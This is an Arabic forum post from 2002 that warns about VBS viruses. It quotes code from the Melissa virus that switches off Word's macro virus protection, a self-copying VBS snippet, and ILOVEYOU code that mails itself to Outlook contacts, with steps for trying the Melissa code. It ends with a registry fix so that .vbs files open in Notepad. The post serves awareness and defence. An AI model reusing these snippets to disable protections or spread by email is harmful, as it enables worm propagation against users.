عرض مشاركة واحدة
قديم 13-07-02, 10:19 AM   #1

الغواص
عضو نشيط

 
الصورة الرمزية الغواص  







رايق

معصب فيروسات VBS خطيرة أحذروها


تنتشر هذه الفيروسات بأساليب معينة تزيد بزيادة مبتكريها وطرائقهم , مثل الرسائل المسلسلة Chain mail , المخطط الهرمى Pyramid scheme , الدودة Worm , حصان طروادة Trojan .
و نجيب فيما يلى على أهم سؤالين يسألهما المتعاملون مع الكمبيوتر بشأن هذه الفيروسات , وهما :

1 - كيف يكسر الفيروس جدار الأمان أو الحماية Security?
2 - كيف يتكاثر الفيروس وينشر نفسه بأعداد ضخمة على الشبكات



** كسر الأمان?

وبالنسبة لإجابة السؤال الأول فإن هناك طرق عديدة لذلك تقوم على استغلال بعض الثغرات الأمنية فى الأنظمة شائعة الاستخدام مثل مجموعة برامج Microsoft Office , ونرى الآن - عمليا - مثالا لذلك .

الجزء التالى من فيروس ميلسا Melissa الذى صممه ديفيد سميث , و ضرب الشبكة الإنترنت فى 26 /3/1999 وهذا الجزء يمكن تجربته من خلال أى نسخة من برامج Office 97 أو أحدث , وهو يوقف عمل رسالة التحذير عند فتح ملف يحتوى على ماكرو Macro .


** البرمجى Source code

On Error Resume Next

If System.PrivateProfileString (, HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Wo rd\Security, Level) <> Then

CommandBars(Macro).Controls(Security...).Enabled = False

System.PrivateProfileString(, HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Wo rd\Security, Level) = 1&

Else

'CommandBars(Tools).Controls(Macro).Enabled = False

Options.ConfirmConversions = (0): Options.VirusProtection = (0): Options.SaveNormalPrompt = (0)

End If

و تقوم هذه الشفرة Code بتغيير إعدادات Settings برنامج وورد لكيلا يلاحظ وجود الفيروس.

فتقوم اولا بفحص نسخة برنامج وورد Word تحت المسار التالى فى التسجيل -:Registry HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Wo rd\Security

لكى تتعرف على نسخة وورد المثبتة , ( لاحظ استخدام أمر On Error Resume Next لكى لا تظهر إحدى رسائل الخطأ فى حالة حدوثه , و ينتبه المستخدم لوجود شئ غير طبيعى ) .

وتعديل خيار حماية من فيروس الماكرو Options.VirusProtection بإعطائه القيمة (0) لكى يوقف فاعليته

ابدأ بفتح ملف جديد , ثم اذهب لقائمة أدوات ثم ماكرو ثم محرر Visual Basic وضع الشفرة السابقة فى الحدث Document_Open وقم بتشغيل الشفرة Run .

واحفظ الملف و أغلقه , ثم أعد فتحه مرة أخرى , و هذه المرة لن يظهر التحذير السابق.

لا تنس أخيرا أن تعيد التحذير بعد مسح الملف بالذهاب إلى قائمة أدوات فمنها إلى خيارات ثم اختيار الأمر عام .



** الانتشار
ينتشر الفيروس عن طريق نسخ نفسه أو كتابة نفسه كملف نصى جديد , والوسائل المتاحة لذلك محدودة , وجدير بالذكر أن شركة مايكروسوفت المصنعة قد أزالت الكثير من الدوال Functions فى VBS من أجل أمن النظام System Security , كدالة Kill (file name) الموجودة فى لغتى VB, VBA التى تستخدم فى مسح الملفات , كما أن VBS لا تكتب سوى الملفات النصية Textual التى تستخدم فى تحديد بعض المعلومات لمواقع الإنترنت من الأجهزة العميل Client , مثل ملفات كوكيز كلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةs الشائعة.

وفيما يلى طريقة لاستخدام أمر Copy, باشتقاق الكائن Object الخاص بنظام الملفات FileSystemObject , ثم استدعاء الأمر Copy ليقوم بنسخ الملف ذاته إلى مجلد خاص Special folder هو مجلد الملفات المؤقتة Temporary الذى غالبا ما يكون C:\Windows\Temp\


** النص البرمجى Source code

dim fso,c,dirtemp,x

Set fso = CreateObject(Scripting.FileSystemObject)

Set dirtemp = fso.GetSpecialFolder(2)

Set c = fso.GetFile(WScript.ScriptFullName)

c.Copy(dirtemp & \VBSdemo.vbs)

و يمكن استخدام أى أسلوب عادى مع الأمر Copy مثل الحلقة التكرارية Loop الآتية:

for x = 0 to 5

c.Copy(dirtemp & \VBSdemo & x & .vbs)

next

ولتجربة هذه الشفرة , انشئ ملفا نصيا بالامتداد VBS , و انسخ فيه هذه الشفرة , و سيقوم بترجمتها و تنفيذها برنامج Windows Scripting Host الذى يأتى مع الإعدادات القياسية لويندوز 98 أوإنترنت اكسبلورر 5.

** استغلال أوتلوك
تتمكن بعض الفيروسات من الاستفادة من برنامج أوتلوك Outlook لدعمه للغة VBS , ولذلك, فإن مستخدمى برامج البريد الإلكترونى التى لا تدعم VBS تكون أنظمتهم البريدية فى أمان.

كذلك الحال بالنسبة لمستخدمى خدمة البريد المبنية على الخادم Server-based email مثل بريد Hotmail و Yahoo و مكتوب .

ويتسلل الفيروس إلى قائمة العناوين البريدية المسجلة فى أوتلوك و يكتب رسالته الخاصة ويرفق في طيها نسخة منه على هيئة ملف VBS , ثم يرسلها لكل العناوين المتاحة, ليبدأ ملف VBS المرسل بدوره نفس الرحلة بعد وصوله مباشرة .

وفى الشفرة التالية من فيروس I love you سنرى بعضا من ذلك .


** النص البرمجى Source code

dim out,mal

set out=WScript.CreateObject(Outlook.Application)

set mal=out.CreateItem(0)

mal.Recipients.Add(malead)

mal.Subject = ILOVEYOU

mal.Body = vbcrlf & kindly check the attached LOVELETTER coming from me.

mal.Attachments.Add(dirsystem&\LOVE-LETTER-FOR-YOU.TXT.vbs)

mal.Send

تقوم هذه الشفرة من الفيروس باشتقاق نسخة من أوتلوك وتحم لها فى الذاكرة و تبدأ فى إعداد الرسالة بكتابة اسم المستلم من قائمة المتلقين Recipients وكتابة رأس الموضوع:I LOVE YOU والمحتوى الذى يطلب فتح الملف المرفق , ثم يضيف ملف VBS كملف ملحق Attachment باسم LOVE-LETTER-FOR-YOU.TXT.vbs , وأخيرا يرسل الرسالة .

الوقاية

لا توجد طريقة للوقاية تضمن نسبة نجاح 100 % , فالطرق الجديدة التى يبتكرها منتجو الفيروسات لا يمكن التنبؤ بها , والشركات المصنعة لمضادات الفيروسات Antivirus نفسها لا تتوقع كل هذه الطرق , و حتى لو صنعت أمصالها المضادة فى وقت يسير , فيكفى ساعات محدودة لانتشار هذه الفيروسات التى تتزايد بتتابع أسى exponential .

و على المستخدم إذا أن يكون حريصا فى التعامل مع ملفات VBS , و يمكن أيضا استخدام النص التالى فى تعديل (التسجيل) لكى يفتح هذه الملفات ويضع محتوياتها فى برنامج المفكرة NotePad , بدلا من تنفيذها مباشرة .

REGEDIT4

//

// Copyright c 2000 Steven John Mapua

// Freely distribute

//

[HKEY_CLASSES_ROOT\.VBS]

@=txtfile

Original_Default=VBSFile

احفظ النص عاليه فى ملف نصى و غير الامتداد إلى reg مثل vbsfix.reg و عند النقر على الملف سيقوم بالتعديل المطلوب ( ربما يسألك الموافقة على التعديل أولا )
=====

لنا لقاء

__________________

الغــــواص

الغواص غير متصل